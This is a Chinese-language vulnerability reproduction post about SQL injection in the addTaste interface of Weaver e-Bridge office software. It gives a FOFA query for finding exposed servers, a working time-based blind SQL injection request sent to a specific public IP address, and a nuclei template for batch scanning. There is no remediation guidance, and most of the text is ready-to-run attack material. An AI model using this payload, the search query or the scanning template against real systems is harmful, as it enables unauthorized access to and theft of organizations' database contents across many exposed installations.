漏洞描述

e-Bridge 提供了一套全面的办公自动化工具，包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。它的核心理念是将企业内部的各种业务流程数字化，并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该系统 addTaste接口存在SQL注入漏洞，通过此漏洞攻击者可获取企业数据库敏感数据。

fofa语句

app="泛微-云桥e-Bridge"

漏洞复现

打开网页

构造payload

GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
Host: 111.42.150.19:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

nuclei批量检测

id: fanwei-e-Bridge-addTaste-sql

info:
  name: fanwei-e-Bridge-addTaste-sql
  author: changge
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |+
        GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(5-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
      - type: status
        status:
          - 200